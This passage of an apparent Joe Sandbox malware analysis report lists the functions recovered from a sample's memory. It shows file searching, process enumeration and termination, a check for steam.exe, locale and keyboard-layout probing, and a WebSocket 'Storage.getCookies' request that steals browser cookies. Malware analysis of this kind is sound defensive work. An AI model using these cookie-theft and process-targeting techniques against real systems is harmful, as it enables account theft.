                            • FindClose.KERNEL32(00000000), ref: 006ED746
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 963d19950e5c25a8be2625abd4fa7b07806a6b6b2cf77b3697a37a2ab3082456
                            • Instruction ID: e804697fa7c7026a4a06831a6b25a17f4e8e743cc9e5a97810fdae483e51f8c7
                            • Opcode Fuzzy Hash: 963d19950e5c25a8be2625abd4fa7b07806a6b6b2cf77b3697a37a2ab3082456
                            • Instruction Fuzzy Hash: 3C615FB1D102199FCB60EF75DC88ADE77B9EF58300F0485A9E64997351EB34AA44CF90
                            Function 006F48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: abcdc527273ebc1a67e33ee4d43e2a1a80ea4cf14259b24d2d96d3a9e9b514a3
                            • Instruction ID: db3a9efd7ac39eb5e5341a6b9a57c4272c76c57c5ff5ce676efe700784edd906
                            • Opcode Fuzzy Hash: abcdc527273ebc1a67e33ee4d43e2a1a80ea4cf14259b24d2d96d3a9e9b514a3
                            • Instruction Fuzzy Hash: AEA24871E0126D9FDB50DFA8C8807EEBBB6AF48300F1481AAD619A7341DB715E85CF94
                            Function 006E23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E23D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E23F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2402
                            • lstrlen.KERNEL32(\*.*), ref: 006E240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006E2436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E2486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: db3702c543c1e69be693d60ef81773193a973e9b1014a7a2995f06f3541e237e
                            • Instruction ID: bd294700103d1b1e55cb193385bfd294010a507931bf1845ef250046e0b409bf
                            • Opcode Fuzzy Hash: db3702c543c1e69be693d60ef81773193a973e9b1014a7a2995f06f3541e237e
                            • Instruction Fuzzy Hash: E8414471A2525B8BC772EF26DDA5B9E77EBEF24300F046129B84997352CB709C018B94
                            Function 006F46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006F46B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F46C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F46DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 006F46ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F4702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006F4711
                            • CloseHandle.KERNEL32(00000000), ref: 006F4718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F4726
                            • CloseHandle.KERNEL32(00000000), ref: 006F4731
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: b4968e04f5829a7345173836f412259f3cef48462ee29f54cb6038f83503c193
                            • Instruction ID: a4c595acbc9785bd880844b50c8df5eec222f4e7de4dc0bb35c7f60bea2e0726
                            • Opcode Fuzzy Hash: b4968e04f5829a7345173836f412259f3cef48462ee29f54cb6038f83503c193
                            • Instruction Fuzzy Hash: B001C031625129AFE7206B60DC8DFFB377CEB49B41F000098FA45E1181EF749980ABA0
                            Function 006F4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 006F4628
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F4638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 006F4660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F4672
                            • CloseHandle.KERNEL32(00000000), ref: 006F467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 118ed80a639fcf9285e36fc5cfcf9c7ac865088c1de3614dc4d3ed91c80897c0
                            • Instruction ID: 24858fc323ba532906a078067bdb24023a6062c1daf18dc4e0c221cfca14bab6
                            • Opcode Fuzzy Hash: 118ed80a639fcf9285e36fc5cfcf9c7ac865088c1de3614dc4d3ed91c80897c0
                            • Instruction Fuzzy Hash: 7701AD7161A1289FE720AB70AC48FEB77BCEF0A750F0001D5FA48D1181EF748A949BE1
                            Function 006E4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4B7F
                            • lstrlen.KERNEL32(00704CA8), ref: 006E4B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BA7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E4BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E4BFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: eb2e8cd2ff8f2bbc892dbd6f97fca621d868c90be838afc475b4f483fbff99a6
                            • Instruction ID: fd687fcacc0932367963afc98ce5385cc978d0ba7e7b71ab4ec759d436d27018
                            • Opcode Fuzzy Hash: eb2e8cd2ff8f2bbc892dbd6f97fca621d868c90be838afc475b4f483fbff99a6
                            • Instruction Fuzzy Hash: C6313071A252669BC772EF26EC95B9E77B7EF60300F041129F80597351CB30DC018B94
                            Function 00A9A202 Relevance: 11.6, Strings: 8, Instructions: 1575COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =l5$O{]$Qtg?$crO$rQ}t$wG[?$wk5$q~7
                            • API String ID: 0-491307191
                            • Opcode ID: 3be8296af48543e0d930ed063e32f8d95e6f21418c0607e17ac8d6aee3672684
                            • Instruction ID: 3cdfc53741951fbcd643d69772c9071449420788a57b8237e5ef947144f28dc3
                            • Opcode Fuzzy Hash: 3be8296af48543e0d930ed063e32f8d95e6f21418c0607e17ac8d6aee3672684
                            • Instruction Fuzzy Hash: 45B2F7F360C2009FE704AE2DEC8567ABBE9EF94720F1A493DEAC5C7344E63558058697
                            Function 006F2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006F2D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 006F2DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006F2DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006F2DEC
                            • LocalFree.KERNEL32(00000000), ref: 006F2FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 7ea3531b71c47bff1652180222cb8977c9dba17446b138ab3e839f5a663a2de6
                            • Instruction ID: 4fa7547f6f370183031d2bffe08de0c42ca30c61ba6a20b4184792bc3808108b
                            • Opcode Fuzzy Hash: 7ea3531b71c47bff1652180222cb8977c9dba17446b138ab3e839f5a663a2de6
                            • Instruction Fuzzy Hash: E5B12871A14219CFC754CF18C998BA9B7F2FB44324F29C1A9D5089B3A2D7769D82CF80
                            Function 00A90219 Relevance: 10.4, Strings: 7, Instructions: 1608COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #%z$*p4$@e{$[t~$pUg$T}$~vu
                            • API String ID: 0-2409267797
                            • Opcode ID: 6aebf2ee175fe4b76a78f4f9b7b9c7051ea8fbdda60b606fe2ae173ecddc802f
                            • Instruction ID: 3cca8421c349f33be955ae0d92ae8829c05b246e7d5e129025be7bf68308091f
                            • Opcode Fuzzy Hash: 6aebf2ee175fe4b76a78f4f9b7b9c7051ea8fbdda60b606fe2ae173ecddc802f
                            • Instruction Fuzzy Hash: 92B214F360C3049FE304AE2DEC8567ABBE5EF94720F1A4A3DE6C483744EA3558458697
                            Function 00A9F31E Relevance: 10.3, Strings: 7, Instructions: 1589COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'xo$+_o$@[!Z$Gv_q$SKw[$b-*p$g%z
                            • API String ID: 0-165404567
                            • Opcode ID: 918412825d33bf84a31c04418af9c2fc93b867b9489df0546a291c748d0780cd
                            • Instruction ID: 5f5c335017662cd71fb99d7b059beac27a856187bbc06e639378a359caf393eb
                            • Opcode Fuzzy Hash: 918412825d33bf84a31c04418af9c2fc93b867b9489df0546a291c748d0780cd
